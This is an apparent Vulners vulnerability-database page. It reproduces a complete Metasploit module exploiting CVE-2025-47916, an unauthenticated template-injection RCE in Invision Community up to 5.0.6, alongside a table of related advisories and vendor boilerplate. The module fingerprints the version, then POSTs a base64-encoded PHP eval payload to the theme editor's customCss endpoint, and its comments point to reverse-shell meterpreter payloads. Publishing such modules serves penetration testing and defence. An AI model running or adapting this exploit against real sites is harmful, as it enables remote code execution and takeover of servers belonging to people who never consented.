Invision Community 5.0.6 customCss RCE
🗓️ 21 May 2025 18:53:30Reported by Egidio Romano (EgiX), Valentin LobsteinType
metasploit🔗 www.rapid7.com👁 610 Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Invisioncommunity | 21 Nov 202513:16 | – | githubexploit | |
| The vulnerability in the `makeProcessFunction()` function of the `/applications/core/modules/front/system/themeeditor.php` file of the Invision Community (formerly IPS Community Suite) software allows a malicious user to execute arbitrary PHP code. | 12 Jan 202600:00 | – | bdu_fstec | |
| CVE-2025-47916 | 14 May 202512:43 | – | circl | |
| Invision Community 安全漏洞 | 16 May 202500:00 | – | cnnvd | |
| CVE-2025-47916 | 16 May 202500:00 | – | cve | |
| CVE-2025-47916 | 16 May 202500:00 | – | cvelist | |
| Invision Community 5.0.6 - Remote Code Execution (RCE) | 18 May 202500:00 | – | exploitdb | |
| Invision Community <=5.0.6 Unauthenticated RCE via Template Injection | 28 Jul 202605:35 | – | nuclei | |
| CVE-2025-47916 | 16 May 202515:15 | – | nvd | |
| CVE-2025-47916 | 16 May 202515:15 | – | osv |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Payload::Php
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Invision Community 5.0.6 customCss RCE',
'Description' => %q{
Invision Community up to and including version 5.0.6 contains a remote code
execution vulnerability in the theme editor's customCss endpoint. By crafting
a specially formatted `content` parameter with a `{expression="..."}`
construct, arbitrary PHP can be evaluated. This module leverages that flaw
to execute payloads or system commands as the webserver user.
},
'Author' => [
'Egidio Romano (EgiX)', # Vulnerability discovery & original PoC
'Valentin Lobstein' # Metasploit module
],
'References' => [
['CVE', '2025-47916'],
['EDB', '52294'],
['URL', 'https://karmainsecurity.com/KIS-2025-02'],
['URL', 'https://invisioncommunity.com']
],
'License' => MSF_LICENSE,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-05-16',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end
def check
path = normalize_uri(target_uri.path, 'admin', 'install', 'eula.txt')
res = send_request_cgi('uri' => path, 'method' => 'GET')
unless res&.code == 200 && res.body =~ /^ IPS\ ([\d.]+) /
return CheckCode::Unknown('Unable to retrieve or parse IPS version from EULA')
end
version = Rex::Version.new(Regexp.last_match(1))
print_status("Detected IPS version: #{version}")
if version.between?(Rex::Version.new('5.0.0'), Rex::Version.new('5.0.6'))
CheckCode::Appears("IPS version #{version} is vulnerable (≤ 5.0.6)")
else
CheckCode::Safe("IPS version #{version} is not vulnerable")
end
end
def exploit
raw = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
b64 = Rex::Text.encode_base64(raw)
expr = "{expression=\"die(eval(base64_decode('#{b64}')))\"}"
post_data = {
'app' => 'core',
'module' => 'system',
'controller' => 'themeeditor',
'do' => 'customCss',
'content' => expr
}
print_status("Sending exploit to #{Rex::Socket.to_authority(rhost, rport)} ...")
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' => post_data
)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jul 2026 19:06Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8 - 10
EPSS0.84852
SSVC